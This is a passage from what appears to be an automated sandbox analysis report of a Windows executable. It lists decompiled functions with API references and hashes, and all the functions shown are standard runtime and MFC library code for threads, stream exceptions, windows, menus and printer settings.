                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?), ref: 00417094
                  • EnableWindow.USER32(00000000,00000001), ref: 004170D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                  • String ID: 0
                  • API String ID: 1877664794-4108050209
                  • Opcode ID: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction ID: b4bc687f8c3733e7692b145a2cdb5596cc84dfbc90c2c000e693f98fe407a247
                  • Opcode Fuzzy Hash: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction Fuzzy Hash: 9C41D432A043189BDB218F25CC42BDABBB4FB59710F1405AAF555A7280D7B5DEC08F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00433E25, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E00433E25(void* __edx, void* __esi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				DWORD* _v8;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t20;
				DWORD* _t25;
				intOrPtr* _t27;
				intOrPtr _t41;
				void* _t44;

				_t1 =  &_a12; // 0x416327
				_t41 =  *_t1;
				_v8 = 0;
				_t48 = _t41;
				if(_t41 != 0) {
					_push(__esi);
					E00435F8A();
					_t44 = E004381D6(1, 0x214);
					__eflags = _t44;
					if(__eflags == 0) {
						L7:
						_push(_t44);
						E004316F6(0, _t41, _t44, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E00431D64(_v8);
						}
						_t20 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E00436178(0, __edx, _t41, __eflags) + 0x6c)));
						_push(_t44);
						E00436018(0, _t41, _t44, __eflags);
						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
						_t25 = _a24;
						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
						__eflags = _t25;
						if(_t25 == 0) {
							_t10 =  &_a12; // 0x416327
							_t25 = _t10;
						}
						_t20 = CreateThread(_a4, _a8, E00433DA2, _t44, _a20, _t25);
						__eflags = _t20;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L7;
						}
					}
				} else {
					_t27 = E00431D3E(_t48);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t27 = 0x16;
					E004367E9(__edx, _t41, __esi);
					_t20 = 0;
				}
				return _t20;
			}












                  0x00433e2d
                  0x00433e2d
                  0x00433e32
                  0x00433e35
                  0x00433e37
                  0x00433e55
                  0x00433e56
                  0x00433e67
                  0x00433e6b
                  0x00433e6d
                  0x00433eb9
                  0x00433eb9
                  0x00433eba
                  0x00433ec0
                  0x00433ec3
                  0x00433ec8
                  0x00433ecd
                  0x00433ece
                  0x00433ece
                  0x00433e6f
                  0x00433e74
                  0x00433e77
                  0x00433e78
                  0x00433e80
                  0x00433e84
                  0x00433e87
                  0x00433e8c
                  0x00433e8f
                  0x00433e91
                  0x00433e93
                  0x00433e93
                  0x00433e93
                  0x00433ea6
                  0x00433eac
                  0x00433eae
                  0x00433eb6
                  0x00000000
                  0x00433eb6
                  0x00433eae
                  0x00433e39
                  0x00433e39
                  0x00433e3e
                  0x00433e3f
                  0x00433e40
                  0x00433e41
                  0x00433e42
                  0x00433e43
                  0x00433e49
                  0x00433e51
                  0x00433e51
                  0x00433ed4

                  APIs
                  • ___set_flsgetvalue.LIBCMT ref: 00433E56
                  • __calloc_crt.LIBCMT ref: 00433E62
                  • __getptd.LIBCMT ref: 00433E6F
                  • CreateThread.KERNEL32(?,?,00433DA2,00000000,?,004164CA), ref: 00433EA6
                  • GetLastError.KERNEL32(?,73BCF560,00000000,?,?,004164CA,?,?,00416327,?,?,?), ref: 00433EB0
                  • __dosmaperr.LIBCMT ref: 00433EC8
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                    • Part of subcall function 004367E9: __decode_pointer.LIBCMT ref: 004367F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                  • String ID: 'cA
                  • API String ID: 1803633139-2370355221
                  • Opcode ID: 97ae358cae2b5e0f0641d5fcdea82227c1b56a12331c9cfd899aa4e2063e2b34
                  • Instruction ID: b1eb4aeef8b7e0ec2ddc809c9a465840061659f621b381ffd8a73e26934c2983
                  • Opcode Fuzzy Hash: 97ae358cae2b5e0f0641d5fcdea82227c1b56a12331c9cfd899aa4e2063e2b34
                  • Instruction Fuzzy Hash: 6811C172500209AFDB11BFA6DC8289F77A5EF08329F10543FF511921A1DB799A019BA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402D20, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00402D20(void* __ecx, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v40;
				char _v44;
				void* _v84;
				char _v88;
				char _v108;
				char _v112;
				void* _v152;
				char _v156;
				signed int _t30;
				signed int _t34;
				signed char _t48;
				void* _t60;

				_push(0xffffffff);
				_push(E0044A998);
				_push( *[fs:0x0]);
				_t30 =  *0x463404; // 0x38a11573
				_push(_t30 ^ _t60 - 0x00000088);
				 *[fs:0x0] =  &_v12;
				_t34 = _a4 & 0x00000017;
				 *(__ecx + 8) = _t34;
				_t48 =  *(__ecx + 0xc) & _t34;
				if(_t48 != 0) {
					if(_a8 != 0) {
						E00430CF4(0, 0);
					}
					_t65 = _t48 & 0x00000004;
					if((_t48 & 0x00000004) != 0) {
						E00402CE0( &_v108, "ios_base::badbit set");
						_v8 = 0;
						E00402BA0(_t65,  &_v112);
						_t48 =  &_v156;
						_v156 = 0x44f0a8;
						E00430CF4(_t48, 0x45ad90);
					}
					_t66 = _t48 & 0x00000002;
					if((_t48 & 0x00000002) != 0) {
						E00402CE0( &_v108, "ios_base::failbit set");
						_v8 = 1;
						E00402BA0(_t66,  &_v112);
						_v156 = 0x44f0a8;
						E00430CF4( &_v156, 0x45ad90);
					}
					E00402CE0( &_v40, "ios_base::eofbit set");
					_v8 = 2;
					E00402BA0(_t66,  &_v44);
					_v88 = 0x44f0a8;
					_t34 = E00430CF4( &_v88, 0x45ad90);
				}
				 *[fs:0x0] = _v12;
				return _t34;
			}

















                  0x00402d20
                  0x00402d22
                  0x00402d2d
                  0x00402d34
                  0x00402d3b
                  0x00402d43
                  0x00402d50
                  0x00402d53
                  0x00402d59
                  0x00402d5b
                  0x00402d69
                  0x00402d6f
                  0x00402d6f
                  0x00402d74
                  0x00402d77
                  0x00402d82
                  0x00402d90
                  0x00402d9b
                  0x00402da5
                  0x00402daa
                  0x00402db2
                  0x00402db2
                  0x00402db7
                  0x00402dba
                  0x00402dc5
                  0x00402dd3
                  0x00402dde
                  0x00402ded
                  0x00402df5
                  0x00402df5
                  0x00402e03
                  0x00402e11
                  0x00402e1c
                  0x00402e2b
                  0x00402e33
                  0x00402e33
                  0x00402e3f
                  0x00402e4d

                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00402D6F
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • __CxxThrowException@8.LIBCMT ref: 00402DB2
                  • __CxxThrowException@8.LIBCMT ref: 00402DF5
                  • __CxxThrowException@8.LIBCMT ref: 00402E33
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 3476068407-1866435925
                  • Opcode ID: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction ID: 6733c9bcb70d95c348e19533369f8285caa6829711c6102e50207661ceb21adc
                  • Opcode Fuzzy Hash: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction Fuzzy Hash: 20219371058340AED365DB14C956F9EB7E4BF84704F508A2EF489522C2DBBC940CCB2B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042B903, Relevance: 12.1, APIs: 8, Instructions: 105windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E0042B903(intOrPtr __ecx, void* __eflags) {
				int _v8;
				struct HWND__* _v12;
				intOrPtr _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				int _t52;
				void* _t54;
				intOrPtr* _t60;
				int _t62;
				void* _t66;
				void* _t81;
				void* _t83;
				intOrPtr _t84;
				void* _t87;

				_t87 = __eflags;
				_t84 = __ecx;
				_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x74)) + 0x20)) - lstrlenA( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1;
				E00431160(_t81,  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x74)) + 0x1c)) + lstrlenA( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1, 0,  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x74)) + 0x20)) - lstrlenA( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1);
				_t44 = GetFocus();
				_t82 =  *((intOrPtr*)(_t84 + 0x74));
				_t71 = _t84;
				_v12 = _t44;
				_v8 = 0;
				 *( *((intOrPtr*)(_t84 + 0x74)) + 4) = E004177A7(0, _t84, _t87);
				E0040EEF5(_t87);
				_t47 =  *((intOrPtr*)(_t84 + 0x74));
				_t66 = EnableWindow;
				if( *(_t47 + 4) != 0) {
					_t62 = IsWindowEnabled( *(_t47 + 4));
					_t89 = _t62;
					if(_t62 != 0) {
						_v8 = 1;
						EnableWindow( *( *((intOrPtr*)(_t84 + 0x74)) + 4), 0);
					}
				}
				_t48 = E0041EDAB(_t66, _t82, _t84, _t89);
				_v16 = _t48;
				if( *((intOrPtr*)(_t84 + 0x78)) == 1) {
					L6:
					E00410F0D(__eflags, _t84);
					goto L7;
				} else {
					_t71 =  *((intOrPtr*)(_t84 + 0x74));
					if(( *( *((intOrPtr*)(_t84 + 0x74)) + 0x34) & 0x00080000) == 0) {
						goto L6;
					}
					 *((intOrPtr*)(_t48 + 0x18)) = _t84;
					L7:
					_t92 =  *((intOrPtr*)(_t84 + 0x78)) - 1;
					if( *((intOrPtr*)(_t84 + 0x78)) != 1) {
						__eflags =  *((intOrPtr*)(_t84 + 0x88));
						_push( *((intOrPtr*)(_t84 + 0x74)));
						if(__eflags == 0) {
							_t50 = E0042AF21(_t71);
						} else {
							_t50 = E0042AF05(_t71);
						}
						_t83 = _t50;
					} else {
						E0042B39D(_t66, _t84, _t79, _t82, _t84, _t92);
						_t60 =  *((intOrPtr*)(_t84 + 0x80));
						_t83 = (0 |  *((intOrPtr*)( *_t60 + 0xc))(_t60,  *( *((intOrPtr*)(_t84 + 0x74)) + 4)) != 0x00000000) + 1;
					}
					 *(_v16 + 0x18) =  *(_v16 + 0x18) & 0x00000000;
					if(_v8 != 0) {
						EnableWindow( *( *((intOrPtr*)(_t84 + 0x74)) + 4), 1);
					}
					_t52 = IsWindow(_v12);
					_t95 = _t52;
					if(_t52 != 0) {
						SetFocus(_v12);
					}
					E004177E3(_t66, _t84, _t83, _t84, _t95);
					if(_t83 == 0) {
						_t54 = 2;
						return _t54;
					} else {
						return _t83;
					}
				}
			}























                  0x0042b903
                  0x0042b90d
                  0x0042b926
                  0x0042b92f
                  0x0042b937
                  0x0042b93d
                  0x0042b940
                  0x0042b942
                  0x0042b945
                  0x0042b94d
                  0x0042b950
                  0x0042b955
                  0x0042b95b
                  0x0042b961
                  0x0042b966
                  0x0042b96c
                  0x0042b96e
                  0x0042b978
                  0x0042b97f
                  0x0042b97f
                  0x0042b96e
                  0x0042b981
                  0x0042b98a
                  0x0042b98d
                  0x0042b9a0
                  0x0042b9a1
                  0x00000000
                  0x0042b98f
                  0x0042b98f
                  0x0042b999
                  0x00000000
                  0x00000000
                  0x0042b99b
                  0x0042b9a6
                  0x0042b9a6
                  0x0042b9aa
                  0x0042b9d1
                  0x0042b9d8
                  0x0042b9db
                  0x0042b9e4
                  0x0042b9dd
                  0x0042b9dd
                  0x0042b9dd
                  0x0042b9e9
                  0x0042b9ac
                  0x0042b9ae
                  0x0042b9b6
                  0x0042b9cd
                  0x0042b9cd
                  0x0042b9ee
                  0x0042b9f6
                  0x0042ba00
                  0x0042ba00
                  0x0042ba05
                  0x0042ba0b
                  0x0042ba0d
                  0x0042ba12
                  0x0042ba12
                  0x0042ba1a
                  0x0042ba21
                  0x0042ba29
                  0x00000000
                  0x0042ba23
                  0x00000000
                  0x0042ba23
                  0x0042ba21

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 0042B916
                  • _memset.LIBCMT ref: 0042B92F
                  • GetFocus.USER32 ref: 0042B937
                    • Part of subcall function 0040EEF5: UnhookWindowsHookEx.USER32(?), ref: 0040EF25
                  • IsWindowEnabled.USER32(?), ref: 0042B966
                  • EnableWindow.USER32(?,00000000), ref: 0042B97F
                  • EnableWindow.USER32(00000000,00000001), ref: 0042BA00
                  • IsWindow.USER32(?), ref: 0042BA05
                  • SetFocus.USER32(?), ref: 0042BA12
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$EnableFocus$EnabledHookUnhookWindows_memsetlstrlen
                  • String ID:
                  • API String ID: 3424750955-0
                  • Opcode ID: 396e8230032d167e0f749f7c4e66d527f1a44f3aef8f9213c19133dde9002ae0
                  • Instruction ID: 5ffdb8c87b23e72ae1c3345b555018d1f88239f1c59b945354e68bb63e707acc
                  • Opcode Fuzzy Hash: 396e8230032d167e0f749f7c4e66d527f1a44f3aef8f9213c19133dde9002ae0
                  • Instruction Fuzzy Hash: 2C31D170700A10EFDB219F65E989B5ABBF1FF44704F54442EEA4687261CB39EC81CB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004042A0, Relevance: 12.1, APIs: 8, Instructions: 94windowsynchronizationsleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E004042A0(void* __ecx) {
				void* __ebx;
				void* _t23;
				void* _t37;
				void* _t38;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;
				void* _t54;

				_t23 = E0040EE3C(_t37, __ecx,  *((intOrPtr*)(_t54 + 0x18)));
				_t51 =  *((intOrPtr*)(_t54 + 0x20));
				_t38 = _t23;
				do {
					_t53 = 0;
					_t3 = _t53 + 5; // 0x5
					_t52 = _t3;
					do {
						if(_t51 == 0) {
							L6:
							if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
								_push(0);
								_push(_t52);
								_push(0x401);
								if(_t51 != 0) {
									PostMessageA( *(_t38 + 0x20), ??, ??, ??);
								} else {
									SendMessageA( *(_t38 + 0x20), ??, ??, ??);
								}
							}
							Sleep( *(_t54 + 0x24) * 0x32);
							goto L11;
						} else {
							if(WaitForSingleObject( *(_t51 + 0x18), 0) == 0) {
								if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
									PostMessageA( *(_t38 + 0x20), 0x401, 0, 0);
								}
								return 0;
							} else {
								if(WaitForSingleObject( *(_t51 + 0x10), 0) != 0) {
									goto L6;
								} else {
									 *((intOrPtr*)(_t54 + 0x14)) =  *_t51;
									 *((intOrPtr*)(_t54 + 0x18)) =  *((intOrPtr*)(_t51 + 4));
									_t53 = 1;
								}
								goto L11;
							}
						}
						L21:
						L11:
						_t52 = _t52 + 5;
					} while (_t52 < 0x64);
					if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
						_push(0);
						_push(0x64);
						_push(0x401);
						if(_t51 != 0) {
							PostMessageA( *(_t38 + 0x20), ??, ??, ??);
						} else {
							SendMessageA( *(_t38 + 0x20), ??, ??, ??);
						}
					}
				} while (_t53 != 0);
				_t19 = _t53 + 1; // 0x1
				 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x1c)))) =  *((intOrPtr*)(_t54 + 0x14)) +  *((intOrPtr*)(_t54 + 0x18));
				return _t19;
				goto L21;
			}











                  0x004042a9
                  0x004042ae
                  0x004042b2
                  0x004042b4
                  0x004042b4
                  0x004042b6
                  0x004042b6
                  0x004042c0
                  0x004042c2
                  0x004042fc
                  0x00404301
                  0x00404303
                  0x00404305
                  0x00404306
                  0x0040430d
                  0x0040431f
                  0x0040430f
                  0x00404313
                  0x00404313
                  0x0040430d
                  0x0040432d
                  0x00000000
                  0x004042c4
                  0x004042d2
                  0x0040438a
                  0x00404399
                  0x00404399
                  0x004043a5
                  0x004042d8
                  0x004042e6
                  0x00000000
                  0x004042e8
                  0x004042ed
                  0x004042f1
                  0x004042f5
                  0x004042f5
                  0x00000000
                  0x004042e6
                  0x004042d2
                  0x00000000
                  0x00404333
                  0x00404333
                  0x00404336
                  0x00404340
                  0x00404342
                  0x00404344
                  0x00404346
                  0x0040434d
                  0x0040435f
                  0x0040434f
                  0x00404353
                  0x00404353
                  0x0040434d
                  0x00404365
                  0x0040437d
                  0x00404381
                  0x00404384
                  0x00000000

                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                  • SendMessageA.USER32(?,00000401,00000005,00000000), ref: 00404313
                  • PostMessageA.USER32 ref: 0040431F
                  • Sleep.KERNEL32(?,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 0040432D
                  • SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • PostMessageA.USER32 ref: 0040435F
                  • PostMessageA.USER32 ref: 00404399
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Post$ObjectSendSingleWait$Sleep
                  • String ID:
                  • API String ID: 2464283338-0
                  • Opcode ID: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction ID: e8d374fd60e575347347b4847cbe04a4b6a9ea2e9a853ff6579190935c6ace5b
                  • Opcode Fuzzy Hash: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction Fuzzy Hash: 8B31AAB5304300ABD720CF61D888B6B77A4FBC8740F21492EFA45AB2D0C774E801CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004058EB, Relevance: 12.1, APIs: 8, Instructions: 74windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E004058EB(struct HMENU__* _a4, struct HMENU__* _a8, signed int _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				signed int _v20;
				int _t34;
				int _t36;
				struct HMENU__* _t40;

				_v16 = GetMenuItemCount(_a8);
				_t34 = GetMenuItemCount(_a4) - 1;
				_v12 = _t34;
				if(_t34 >= 0) {
					while(1) {
						_t40 = GetSubMenu(_a4, _t34);
						_t36 = 0;
						if(_t40 == 0) {
							goto L15;
						}
						if(_a12 == 0) {
							_v8 = 0;
							if(_v16 <= 0) {
								goto L15;
							}
							while(GetSubMenu(_a8, _v8) != _t40) {
								_v8 = _v8 + 1;
								_t36 = _v8;
								if(_t36 < _v16) {
									continue;
								}
								goto L15;
							}
							_t36 = RemoveMenu(_a4, _v12, 0x400);
							goto L15;
						}
						_t36 = GetMenuItemCount(_t40);
						_v8 = _v8 & 0x00000000;
						_v20 = 0;
						if(0 <= 0) {
							goto L15;
						}
						while(GetSubMenu(_t40, _v8) != _a12) {
							_v8 = _v8 + 1;
							_t36 = _v8;
							if(_t36 < _v20) {
								continue;
							}
							goto L15;
						}
						_t36 = RemoveMenu(_t40, _v8, 0x400);
						_a12 = _a12 & 0x00000000;
						L15:
						_t30 =  &_v12;
						 *_t30 = _v12 - 1;
						if( *_t30 >= 0) {
							_t34 = _v12;
							continue;
						}
						return _t36;
					}
				}
				return _t34;
			}










                  0x00405902
                  0x00405907
                  0x00405908
                  0x0040590b
                  0x0040591e
                  0x00405924
                  0x00405926
                  0x0040592a
                  0x00000000
                  0x00000000
                  0x0040592f
                  0x0040596f
                  0x00405972
                  0x00000000
                  0x00000000
                  0x00405974
                  0x00405980
                  0x00405983
                  0x00405989
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040598b
                  0x00405998
                  0x00000000
                  0x00405998
                  0x00405932
                  0x00405934
                  0x00405938
                  0x0040593d
                  0x00000000
                  0x00000000
                  0x0040593f
                  0x0040594a
                  0x0040594d
                  0x00405953
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405955
                  0x00405960
                  0x00405966
                  0x0040599e
                  0x0040599e
                  0x0040599e
                  0x004059a1
                  0x0040591b
                  0x00000000
                  0x0040591b
                  0x00000000
                  0x004059a8
                  0x0040591e
                  0x004059ab

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CountItem$Remove
                  • String ID:
                  • API String ID: 3494307843-0
                  • Opcode ID: 355b6eac9d52a1f3d8502844bc001d4e6e353e26e1e23ac2360e34f5f54add6f
                  • Instruction ID: 49eee78c3151055738ae538050c0b4c0c1aa464ef4351a21364b38b03e5811b7
                  • Opcode Fuzzy Hash: 355b6eac9d52a1f3d8502844bc001d4e6e353e26e1e23ac2360e34f5f54add6f
                  • Instruction Fuzzy Hash: E121F8B5900609FBCF11DFA5CD409AFBBBAFB44320F2045A2E905B2291D7399A51DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414F48, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00414F48(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E0041FD19(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0041FD19( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                  0x00414f4d
                  0x00414f4f
                  0x00414f51
                  0x00414f59
                  0x00414f73
                  0x00414f7b
                  0x00414f85
                  0x00414f8c
                  0x00414f8e
                  0x00414f93
                  0x00414f96
                  0x00414f96
                  0x00414fad
                  0x00414fb4
                  0x00414fcc
                  0x00414fd1
                  0x00414fd6
                  0x00414fd6
                  0x00414fdc
                  0x00414fdc
                  0x00414f8c
                  0x00414fe1
                  0x00414fe5

                  APIs
                  • GlobalLock.KERNEL32 ref: 00414F67
                  • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,00410705,?), ref: 00414F73
                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414F85
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414FA5
                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00414FAD
                  • GlobalLock.KERNEL32 ref: 00414FB7
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FC4
                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FDC
                    • Part of subcall function 0041FD19: GlobalFlags.KERNEL32(?), ref: 0041FD28
                    • Part of subcall function 0041FD19: GlobalUnlock.KERNEL32(?,?,00414FD6,?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705), ref: 0041FD3A
                    • Part of subcall function 0041FD19: GlobalFree.KERNEL32 ref: 0041FD45
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                  • String ID:
                  • API String ID: 168474834-0
                  • Opcode ID: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction ID: 948f0dece0448d59d7c1233082a5740d041519e2e2aed2f4fe9fb02b6f449665
                  • Opcode Fuzzy Hash: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction Fuzzy Hash: 5811CE79600604BBDB229BB6DC49CBF7EEDFBC5704710042AFA06D2221D739CA42D728
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00433DA2, Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 66%
                  			E00433DA2(intOrPtr __edx, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				struct _SECURITY_ATTRIBUTES* _v0;
				DWORD* _v12;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t27;
				void* _t33;
				DWORD* _t38;
				intOrPtr* _t40;
				void* _t42;
				void* _t48;
